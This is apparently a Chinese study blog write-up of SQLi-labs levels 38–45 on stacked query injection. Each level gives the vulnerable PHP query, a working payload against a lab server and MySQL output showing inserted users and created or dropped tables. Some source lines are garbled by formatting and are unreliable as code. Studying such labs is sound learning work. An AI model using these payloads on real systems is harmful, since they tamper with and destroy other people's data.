Sqli-labs Less38-45 堆叠注入

本文记录 SQL 注入的学习过程，资料为 SQLi

SQLi 博客目录

Less - 38: GET- Stacked Query Injection - String

1. 源代码

    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
   

2. 测试

    http://10.10.10.137/sqli-labs/Less-38/?id=1';insert into users(id,username,password) values ('38','less38','hello')-- 
   

   

    mysql> select * from users;
    +----+----------+------------+
    | id | username | password   |
    +----+----------+------------+
    |  1 | Dumb     | Dumb       | 
    |  2 | Angelina | I-kill-you | 
    |  3 | Dummy    | p@ssword   | 
    |  4 | secure   | crappy     | 
    |  5 | stupid   | stupidity  | 
    |  6 | superman | genious    | 
    |  7 | batman   | mob!le     | 
    |  8 | admin    | admin      | 
    |  9 | admin1   | admin1     | 
    | 10 | admin2   | admin2     | 
    | 11 | admin3   | admin3     | 
    | 12 | dhakkan  | dumbo      | 
    | 14 | admin4   | admin4     | 
    | 38 | less38   | hello      | 
    +----+----------+------------+
    14 rows in set (0.00 sec)
   

   发现已经添加了一个 less38 用户

Less - 39: GET - Stacked Query Injection - Intiger based

1. 源代码

   $sql="SELECT\ast FROMusersWHEREid=$id LIMIT 0,1";

2. 测试

    http://10.10.10.137/sqli-labs/Less-39/?id=1;insert into users(id,username,password) values ('39','less39','hello')--+	
   

   

    mysql> select * from users;
    +----+----------+------------+
    | id | username | password   |
    +----+----------+------------+
    |  1 | Dumb     | Dumb       | 
    |  2 | Angelina | I-kill-you | 
    |  3 | Dummy    | p@ssword   | 
    |  4 | secure   | crappy     | 
    |  5 | stupid   | stupidity  | 
    |  6 | superman | genious    | 
    |  7 | batman   | mob!le     | 
    |  8 | admin    | admin      | 
    |  9 | admin1   | admin1     | 
    | 10 | admin2   | admin2     | 
    | 11 | admin3   | admin3     | 
    | 12 | dhakkan  | dumbo      | 
    | 14 | admin4   | admin4     | 
    | 38 | less38   | hello      | 
    | 39 | less39   | hello      | 
    +----+----------+------------+
    15 rows in set (0.00 sec)
   

   可以看到已经添加了 less39 用户了

Less - 40: GET - BLIND based - String - Stacked

1. 源代码

    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
   

2. 测试

    http://10.10.10.137/sqli-labs/Less-40/?id=1'); insert into users(id,username,password) values ('40','less40','hello')--+
   

   

    mysql> select * from users;
    +-----+----------+------------+
    | id  | username | password   |
    +-----+----------+------------+
    |   1 | Dumb     | Dumb       | 
    |   2 | Angelina | I-kill-you | 
    |   3 | Dummy    | p@ssword   | 
    |   4 | secure   | crappy     | 
    |   5 | stupid   | stupidity  | 
    |   6 | superman | genious    | 
    |   7 | batman   | mob!le     | 
    |   8 | admin    | admin      | 
    |   9 | admin1   | admin1     | 
    |  10 | admin2   | admin2     | 
    |  11 | admin3   | admin3     | 
    |  12 | dhakkan  | dumbo      | 
    |  14 | admin4   | admin4     | 
    |  38 | less38   | hello      | 
    |  39 | less39   | hello      | 
    | 109 | hello    | hello      | 
    |  40 | less40   | hello      | 
    +-----+----------+------------+
    17 rows in set (0.00 sec)
   

   看到添加了 less40 用户

Less - 41: GET - BLIND based - Intiger - Stacked

1. 源代码

    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
   

2. 测试（盲注）

    http://10.10.10.137/sqli-labs/Less-41/?id=1; insert into users(id,username,password) values ('110','less41','hello')--+
   

   

    mysql> select * from users;
    +-----+----------+------------+
    | id  | username | password   |
    +-----+----------+------------+
    |   1 | Dumb     | Dumb       | 
    |   2 | Angelina | I-kill-you | 
    |   3 | Dummy    | p@ssword   | 
    |   4 | secure   | crappy     | 
    |   5 | stupid   | stupidity  | 
    |   6 | superman | genious    | 
    |   7 | batman   | mob!le     | 
    |   8 | admin    | admin      | 
    |   9 | admin1   | admin1     | 
    |  10 | admin2   | admin2     | 
    |  11 | admin3   | admin3     | 
    |  12 | dhakkan  | dumbo      | 
    |  14 | admin4   | admin4     | 
    |  38 | less38   | hello      | 
    |  39 | less39   | hello      | 
    | 109 | hello    | hello      | 
    |  40 | less40   | hello      | 
    | 110 | less41   | hello      | 
    +-----+----------+------------+
    18 rows in set (0.00 sec)
   

   添加了用户 less41

Less - 43: POST - Error based - String - Stacked with twist

1. 源代码

    $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
    $password = $_POST["login_password"];
    $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
   

2. 测试

    username 输入 admin
    password 输入 c');create table less43 like users#
   

   测试登录之后

    mysql> show tables;
    +--------------------+
    | Tables_in_security |
    +--------------------+
    | emails             | 
    | less43             | 
    | referers           | 
    | uagents            | 
    | users              | 
    +--------------------+
    5 rows in set (0.00 sec)
   
    username 输入 admin
    password 输入 c');drop table less43#
   

   测试登录之后

    mysql> show tables;
    +--------------------+
    | Tables_in_security |
    +--------------------+
    | emails             | 
    | referers           | 
    | uagents            | 
    | users              | 
    +--------------------+
    4 rows in set (0.00 sec)
   

Less - 44: POST - Error based - String - Stacked -Blind

1. 源代码

   $username=mysql{i}_{r}ea{l}_{e}scap{e}_{s}tring($con1, $_POST[“login_user”]);
   $password = $_POST[“login_password”];
   $sql="SELECT\ast FROMusersWHEREusername{=}^{\prime }$username’ and password=’$password’";

2. 测试（盲注）

    username 输入 admin
    password 输入 a';insert into users(id,username,password) values ('144','less44','hello')#
   

   测试了登录后

    mysql> select * from users;
    +-----+----------+------------+
    | id  | username | password   |
    +-----+----------+------------+
    |   1 | Dumb     | Dumb       | 
    |   2 | Angelina | I-kill-you | 
    |   3 | Dummy    | p@ssword   | 
    |   4 | secure   | crappy     | 
    |   5 | stupid   | stupidity  | 
    |   6 | superman | genious    | 
    |   7 | batman   | mob!le     | 
    |   8 | admin    | admin      | 
    |   9 | admin1   | admin1     | 
    |  10 | admin2   | admin2     | 
    |  11 | admin3   | admin3     | 
    |  12 | dhakkan  | dumbo      | 
    |  14 | admin4   | admin4     | 
    |  38 | less38   | hello      | 
    |  39 | less39   | hello      | 
    | 109 | hello    | hello      | 
    |  40 | less40   | hello      | 
    | 110 | less41   | hello      | 
    | 144 | less44   | hello      | 
    +-----+----------+------------+
    19 rows in set (0.00 sec)
   

Less - 45: POST - Error based - String - Stacked - Blind

1. 源代码

    $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
    $password = $_POST["login_password"];
    $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
   

2. 测试

    username 输入 admin
    password 输入 c');create table less45 like users#
   

   登录测试之后

    mysql> show tables;
    +--------------------+
    | Tables_in_security |
    +--------------------+
    | emails             | 
    | less45             | 
    | referers           | 
    | uagents            | 
    | users              | 
    +--------------------+
    5 rows in set (0.00 sec)
   

   测试登录

    username 输入 admin
    password 输入 c');drop table less45#
   

   测试之后

    mysql> show tables;
    +--------------------+
    | Tables_in_security |
    +--------------------+
    | emails             | 
    | referers           | 
    | uagents            | 
    | users              | 
    +--------------------+
    4 rows in set (0.00 sec)